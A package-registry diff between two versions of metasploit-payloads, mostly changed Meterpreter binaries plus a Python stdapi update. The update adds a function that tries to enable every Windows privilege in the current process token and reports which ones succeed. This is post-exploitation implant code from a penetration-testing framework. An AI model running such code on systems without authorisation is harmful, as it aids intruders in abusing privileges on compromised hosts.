metasploit-payloads 2.0.110 → 2.0.111
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
- checksums.yaml +4 -4
- checksums.yaml.gz.sig +0 -0
- data/data/android/meterpreter.jar +0 -0
- data/data/android/metstage.jar +0 -0
- data/data/android/shell.jar +0 -0
- data/data/meterpreter/elevator.x64.debug.dll +0 -0
- data/data/meterpreter/elevator.x64.dll +0 -0
- data/data/meterpreter/elevator.x86.debug.dll +0 -0
- data/data/meterpreter/elevator.x86.dll +0 -0
- data/data/meterpreter/ext_server_bofloader.x64.debug.dll +0 -0
- data/data/meterpreter/ext_server_bofloader.x64.dll +0 -0
- data/data/meterpreter/ext_server_bofloader.x86.debug.dll +0 -0
- data/data/meterpreter/ext_server_bofloader.x86.dll +0 -0
- data/data/meterpreter/ext_server_espia.x64.debug.dll +0 -0
- data/data/meterpreter/ext_server_espia.x64.dll +0 -0
- data/data/meterpreter/ext_server_espia.x86.debug.dll +0 -0
- data/data/meterpreter/ext_server_espia.x86.dll +0 -0
- data/data/meterpreter/ext_server_extapi.x64.debug.dll +0 -0
- data/data/meterpreter/ext_server_extapi.x64.dll +0 -0
- data/data/meterpreter/ext_server_extapi.x86.debug.dll +0 -0
- data/data/meterpreter/ext_server_extapi.x86.dll +0 -0
- data/data/meterpreter/ext_server_incognito.x64.debug.dll +0 -0
- data/data/meterpreter/ext_server_incognito.x64.dll +0 -0
- data/data/meterpreter/ext_server_incognito.x86.debug.dll +0 -0
- data/data/meterpreter/ext_server_incognito.x86.dll +0 -0
- data/data/meterpreter/ext_server_kiwi.x64.debug.dll +0 -0
- data/data/meterpreter/ext_server_kiwi.x64.dll +0 -0
- data/data/meterpreter/ext_server_kiwi.x86.debug.dll +0 -0
- data/data/meterpreter/ext_server_kiwi.x86.dll +0 -0
- data/data/meterpreter/ext_server_lanattacks.x64.debug.dll +0 -0
- data/data/meterpreter/ext_server_lanattacks.x64.dll +0 -0
- data/data/meterpreter/ext_server_lanattacks.x86.debug.dll +0 -0
- data/data/meterpreter/ext_server_lanattacks.x86.dll +0 -0
- data/data/meterpreter/ext_server_peinjector.x64.debug.dll +0 -0
- data/data/meterpreter/ext_server_peinjector.x64.dll +0 -0
- data/data/meterpreter/ext_server_peinjector.x86.debug.dll +0 -0
- data/data/meterpreter/ext_server_peinjector.x86.dll +0 -0
- data/data/meterpreter/ext_server_powershell.x64.debug.dll +0 -0
- data/data/meterpreter/ext_server_powershell.x64.dll +0 -0
- data/data/meterpreter/ext_server_powershell.x86.debug.dll +0 -0
- data/data/meterpreter/ext_server_powershell.x86.dll +0 -0
- data/data/meterpreter/ext_server_priv.x64.debug.dll +0 -0
- data/data/meterpreter/ext_server_priv.x64.dll +0 -0
- data/data/meterpreter/ext_server_priv.x86.debug.dll +0 -0
- data/data/meterpreter/ext_server_priv.x86.dll +0 -0
- data/data/meterpreter/ext_server_python.x64.debug.dll +0 -0
- data/data/meterpreter/ext_server_python.x64.dll +0 -0
- data/data/meterpreter/ext_server_python.x86.debug.dll +0 -0
- data/data/meterpreter/ext_server_python.x86.dll +0 -0
- data/data/meterpreter/ext_server_sniffer.x64.dll +0 -0
- data/data/meterpreter/ext_server_sniffer.x86.dll +0 -0
- data/data/meterpreter/ext_server_stdapi.py +95 -7
- data/data/meterpreter/ext_server_stdapi.x64.debug.dll +0 -0
- data/data/meterpreter/ext_server_stdapi.x64.dll +0 -0
- data/data/meterpreter/ext_server_stdapi.x86.debug.dll +0 -0
- data/data/meterpreter/ext_server_stdapi.x86.dll +0 -0
- data/data/meterpreter/ext_server_unhook.x64.debug.dll +0 -0
- data/data/meterpreter/ext_server_unhook.x64.dll +0 -0
- data/data/meterpreter/ext_server_unhook.x86.debug.dll +0 -0
- data/data/meterpreter/ext_server_unhook.x86.dll +0 -0
- data/data/meterpreter/ext_server_winpmem.x64.debug.dll +0 -0
- data/data/meterpreter/ext_server_winpmem.x64.dll +0 -0
- data/data/meterpreter/ext_server_winpmem.x86.debug.dll +0 -0
- data/data/meterpreter/ext_server_winpmem.x86.dll +0 -0
- data/data/meterpreter/metsrv.x64.debug.dll +0 -0
- data/data/meterpreter/metsrv.x64.dll +0 -0
- data/data/meterpreter/metsrv.x86.debug.dll +0 -0
- data/data/meterpreter/metsrv.x86.dll +0 -0
- data/data/meterpreter/screenshot.x64.debug.dll +0 -0
- data/data/meterpreter/screenshot.x64.dll +0 -0
- data/data/meterpreter/screenshot.x86.debug.dll +0 -0
- data/data/meterpreter/screenshot.x86.dll +0 -0
- data/lib/metasploit-payloads/version.rb +1 -1
- data.tar.gz.sig +0 -0
- metadata +1 -1
- metadata.gz.sig +0 -0
checksums.yaml
CHANGED
|
@@ -1,7 +1,7 @@
|
|
|
1
1
|
---
|
|
2
2
|
SHA256:
|
|
3
|
-
metadata.gz:
|
|
4
|
-
data.tar.gz:
|
|
3
|
+
metadata.gz: 7909c1b37004dee1af5bed7dbe25381e5a3fcaba7a7d0ee4101f5e518aef6a36
|
|
4
|
+
data.tar.gz: e438b3747393682ffe47594ce438ed27086781602b524071aa73c51f7477e07a
|
|
5
5
|
SHA512:
|
|
6
|
-
metadata.gz:
|
|
7
|
-
data.tar.gz:
|
|
6
|
+
metadata.gz: cda77751aa1547b93c6be12c0fe4fbedafa915bf5f34a1931d6bef4e44ad6c7c0a89a96fbe6b4878c050a196aa9fd6032800341a38826b5718d0fa3695772240
|
|
7
|
+
data.tar.gz: d40c9e8db0fd4d02e8f8e807fc26ce095b6703548de0c74cce5ad514a9082cee4ebe3b0010d4f2ab1b978d93c79c7184249540839e52f89b1b3bdb7bc8c594b4
|
checksums.yaml.gz.sig
CHANGED
|
Binary file
|
|
Binary file
|
data/data/android/metstage.jar
CHANGED
|
Binary file
|
data/data/android/shell.jar
CHANGED
|
Binary file
|
|
Binary file
|
|
Binary file
|
|
Binary file
|
|
Binary file
|
|
Binary file
|
|
Binary file
|
|
Binary file
|
|
Binary file
|
|
Binary file
|
|
Binary file
|
|
Binary file
|
|
Binary file
|
|
Binary file
|
|
Binary file
|
|
Binary file
|
|
Binary file
|
|
Binary file
|
|
Binary file
|
|
Binary file
|
|
Binary file
|
|
Binary file
|
|
Binary file
|
|
Binary file
|
|
Binary file
|
|
Binary file
|
|
Binary file
|
|
Binary file
|
|
Binary file
|
|
Binary file
|
|
Binary file
|
|
Binary file
|
|
Binary file
|
|
Binary file
|
|
Binary file
|
|
Binary file
|
|
Binary file
|
|
Binary file
|
|
Binary file
|
|
Binary file
|
|
Binary file
|
|
Binary file
|
|
Binary file
|
|
Binary file
|
|
Binary file
|
|
Binary file
|
|
Binary file
|
|
@@ -489,6 +489,7 @@ TLV_TYPE_HANDLE = TLV_META_TYPE_QWORD | 600
|
|
|
489
489
|
TLV_TYPE_INHERIT = TLV_META_TYPE_BOOL | 601
|
|
490
490
|
TLV_TYPE_PROCESS_HANDLE = TLV_META_TYPE_QWORD | 630
|
|
491
491
|
TLV_TYPE_THREAD_HANDLE = TLV_META_TYPE_QWORD | 631
|
|
492
|
+
TLV_TYPE_PRIVILEGE = TLV_META_TYPE_STRING | 632
|
|
492
493
|
|
|
493
494
|
##
|
|
494
495
|
# Fs
|
|
@@ -749,6 +750,25 @@ VER_PLATFORM_WIN32s = 0x0000
|
|
|
749
750
|
VER_PLATFORM_WIN32_WINDOWS = 0x0001
|
|
750
751
|
VER_PLATFORM_WIN32_NT = 0x0002
|
|
751
752
|
|
|
753
|
+
# Token Constants
|
|
754
|
+
TOKEN_ASSIGN_PRIMARY = 0x0001
|
|
755
|
+
TOKEN_DUPLICATE = 0x0002
|
|
756
|
+
TOKEN_IMPERSONATE = 0x0004
|
|
757
|
+
TOKEN_QUERY = 0x0008
|
|
758
|
+
TOKEN_QUERY_SOURCE = 0x0010
|
|
759
|
+
TOKEN_ADJUST_PRIVILEGES = 0x0020
|
|
760
|
+
TOKEN_ADJUST_GROUPS = 0x0040
|
|
761
|
+
TOKEN_ADJUST_DEFAULT = 0x0080
|
|
762
|
+
TOKEN_ADJUST_SESSIONID = 0x0100
|
|
763
|
+
TOKEN_ALL_ACCESS = 0xf01ff
|
|
764
|
+
|
|
765
|
+
# Privilege Constants
|
|
766
|
+
DISABLED = 0x0
|
|
767
|
+
SE_PRIVILEGE_ENABLED_BY_DEFAULT = 0x1
|
|
768
|
+
SE_PRIVILEGE_ENABLED = 0x2
|
|
769
|
+
SE_PRIVILEGE_REMOVED = 0x4
|
|
770
|
+
SE_PRIVILEGE_USED_FOR_ACCESS = 0x800000000
|
|
771
|
+
|
|
752
772
|
# Windows Access Controls
|
|
753
773
|
MAXIMUM_ALLOWED = 0x02000000
|
|
754
774
|
|
|
@@ -855,7 +875,6 @@ def get_stat_buffer(path):
|
|
|
855
875
|
return st_buf
|
|
856
876
|
|
|
857
877
|
def get_token_user(handle):
|
|
858
|
-
TOKEN_QUERY = 0x0008
|
|
859
878
|
TokenUser = 1
|
|
860
879
|
advapi32 = ctypes.windll.advapi32
|
|
861
880
|
advapi32.OpenProcessToken.argtypes = [ctypes.c_void_p, ctypes.c_uint32, ctypes.POINTER(ctypes.c_void_p)]
|
|
@@ -1054,9 +1073,6 @@ def windll_GetVersion():
|
|
|
1054
1073
|
return type('Version', (object,), dict(dwMajorVersion = dwMajorVersion, dwMinorVersion = dwMinorVersion, dwBuild = dwBuild))
|
|
1055
1074
|
|
|
1056
1075
|
def enable_privilege(name, enable=True):
|
|
1057
|
-
TOKEN_ALL_ACCESS = 0xf01ff
|
|
1058
|
-
SE_PRIVILEGE_ENABLED = 0x00000002
|
|
1059
|
-
|
|
1060
1076
|
GetCurrentProcess = ctypes.windll.kernel32.GetCurrentProcess
|
|
1061
1077
|
GetCurrentProcess.restype = ctypes.c_void_p
|
|
1062
1078
|
|
|
@@ -1216,6 +1232,81 @@ def stdapi_sys_config_getuid(request, response):
|
|
|
1216
1232
|
response += tlv_pack(TLV_TYPE_USER_NAME, username)
|
|
1217
1233
|
return ERROR_SUCCESS, response
|
|
1218
1234
|
|
|
1235
|
+
@register_function_if(has_windll)
|
|
1236
|
+
def stdapi_sys_config_getprivs(request, response):
|
|
1237
|
+
GetCurrentProcess = ctypes.windll.kernel32.GetCurrentProcess
|
|
1238
|
+
GetCurrentProcess.restype = ctypes.c_void_p
|
|
1239
|
+
|
|
1240
|
+
advapi32 = ctypes.windll.advapi32
|
|
1241
|
+
OpenProcessToken = advapi32.OpenProcessToken
|
|
1242
|
+
OpenProcessToken.argtypes = [ctypes.c_void_p, ctypes.c_uint32, ctypes.POINTER(ctypes.c_void_p)]
|
|
1243
|
+
OpenProcessToken.restype = ctypes.c_bool
|
|
1244
|
+
|
|
1245
|
+
LookupPrivilegeValue = advapi32.LookupPrivilegeValueW
|
|
1246
|
+
LookupPrivilegeValue.argtypes = [ctypes.c_wchar_p, ctypes.c_wchar_p, ctypes.POINTER(LUID)]
|
|
1247
|
+
LookupPrivilegeValue.restype = ctypes.c_bool
|
|
1248
|
+
|
|
1249
|
+
AdjustTokenPrivileges = advapi32.AdjustTokenPrivileges
|
|
1250
|
+
AdjustTokenPrivileges.argtypes = [ctypes.c_void_p, ctypes.c_bool, PTOKEN_PRIVILEGES, ctypes.c_uint32, PTOKEN_PRIVILEGES, ctypes.POINTER(ctypes.c_uint32)]
|
|
1251
|
+
AdjustTokenPrivileges.restype = ctypes.c_bool
|
|
1252
|
+
|
|
1253
|
+
token = ctypes.c_void_p()
|
|
1254
|
+
success = OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, token)
|
|
1255
|
+
if not success:
|
|
1256
|
+
return error_result_windows(), response
|
|
1257
|
+
|
|
1258
|
+
priv_list = [
|
|
1259
|
+
"SeAssignPrimaryTokenPrivilege",
|
|
1260
|
+
"SeAuditPrivilege",
|
|
1261
|
+
"SeBackupPrivilege",
|
|
1262
|
+
"SeChangeNotifyPrivilege",
|
|
1263
|
+
"SeCreatePagefilePrivilege",
|
|
1264
|
+
"SeCreatePermanentPrivilege",
|
|
1265
|
+
"SeCreateTokenPrivilege",
|
|
1266
|
+
"SeDebugPrivilege",
|
|
1267
|
+
"SeIncreaseBasePriorityPrivilege",
|
|
1268
|
+
"SeIncreaseQuotaPrivilege",
|
|
1269
|
+
"SeLoadDriverPrivilege",
|
|
1270
|
+
"SeLockMemoryPrivilege",
|
|
1271
|
+
"SeMachineAccountPrivilege",
|
|
1272
|
+
"SeProfileSingleProcessPrivilege",
|
|
1273
|
+
"SeRemoteShutdownPrivilege",
|
|
1274
|
+
"SeRestorePrivilege",
|
|
1275
|
+
"SeSecurityPrivilege",
|
|
1276
|
+
"SeShutdownPrivilege",
|
|
1277
|
+
"SeSystemEnvironmentPrivilege",
|
|
1278
|
+
"SeSystemProfilePrivilege",
|
|
1279
|
+
"SeSystemtimePrivilege",
|
|
1280
|
+
"SeTakeOwnershipPrivilege",
|
|
1281
|
+
"SeTcbPrivilege",
|
|
1282
|
+
"SeCreateGlobalPrivilege",
|
|
1283
|
+
"SeCreateSymbolicLinkPrivilege",
|
|
1284
|
+
"SeEnableDelegationPrivilege",
|
|
1285
|
+
"SeImpersonatePrivilege",
|
|
1286
|
+
"SeIncreaseWorkingSetPrivilege",
|
|
1287
|
+
"SeManageVolumePrivilege",
|
|
1288
|
+
"SeRelabelPrivilege",
|
|
1289
|
+
"SeSyncAgentPrivilege",
|
|
1290
|
+
"SeTimeZonePrivilege",
|
|
1291
|
+
"SeTrustedCredManAccessPrivilege",
|
|
1292
|
+
"SeDelegateSessionUserImpersonatePrivilege"
|
|
1293
|
+
]
|
|
1294
|
+
for privilege in priv_list:
|
|
1295
|
+
luid = LUID()
|
|
1296
|
+
name = ctypes.create_unicode_buffer(privilege)
|
|
1297
|
+
success = LookupPrivilegeValue(None, name, luid)
|
|
1298
|
+
if success:
|
|
1299
|
+
size = ctypes.sizeof(TOKEN_PRIVILEGES)
|
|
1300
|
+
size += ctypes.sizeof(LUID_AND_ATTRIBUTES)
|
|
1301
|
+
buffer = ctypes.create_string_buffer(size)
|
|
1302
|
+
tokenPrivileges = ctypes.cast(buffer, PTOKEN_PRIVILEGES).contents
|
|
1303
|
+
tokenPrivileges.PrivilegeCount = 1
|
|
1304
|
+
tokenPrivileges.get_array()[0].Luid = luid
|
|
1305
|
+
tokenPrivileges.get_array()[0].Attributes = SE_PRIVILEGE_ENABLED
|
|
1306
|
+
if AdjustTokenPrivileges(token, False, tokenPrivileges, 0, None, None):
|
|
1307
|
+
response += tlv_pack(TLV_TYPE_PRIVILEGE, privilege)
|
|
1308
|
+
return ERROR_SUCCESS, response
|
|
1309
|
+
|
|
1219
1310
|
@register_function
|
|
1220
1311
|
def stdapi_sys_config_localtime(request, response):
|
|
1221
1312
|
localtime = time.strftime("%Y-%m-%d %H:%M:%S %Z", time.localtime())
|
|
@@ -1374,8 +1465,6 @@ def stdapi_sys_process_get_processes_via_ps(request, response):
|
|
|
1374
1465
|
|
|
1375
1466
|
def stdapi_sys_process_get_processes_via_windll(request, response):
|
|
1376
1467
|
TH32CS_SNAPPROCESS = 2
|
|
1377
|
-
TOKEN_QUERY = 0x0008
|
|
1378
|
-
TokenUser = 1
|
|
1379
1468
|
k32 = ctypes.windll.kernel32
|
|
1380
1469
|
pe32 = PROCESSENTRY32()
|
|
1381
1470
|
pe32.dwSize = ctypes.sizeof(PROCESSENTRY32)
|
|
@@ -1435,7 +1524,6 @@ def stdapi_sys_process_get_processes(request, response):
|
|
|
1435
1524
|
return stdapi_sys_process_get_processes_via_windll(request, response)
|
|
1436
1525
|
else:
|
|
1437
1526
|
return stdapi_sys_process_get_processes_via_ps(request, response)
|
|
1438
|
-
return ERROR_FAILURE, response
|
|
1439
1527
|
|
|
1440
1528
|
@register_function_if(has_windll)
|
|
1441
1529
|
def stdapi_sys_power_exitwindows(request, response):
|
|
Binary file
|
|
Binary file
|
|
Binary file
|
|
Binary file
|
|
Binary file
|
|
Binary file
|
|
Binary file
|
|
Binary file
|
|
Binary file
|
|
Binary file
|
|
Binary file
|
|
Binary file
|
|
Binary file
|
|
Binary file
|
|
Binary file
|
|
Binary file
|
|
Binary file
|
|
Binary file
|
|
Binary file
|
|
Binary file
|
data.tar.gz.sig
CHANGED
|
Binary file
|
metadata
CHANGED
metadata.gz.sig
CHANGED
|
Binary file
|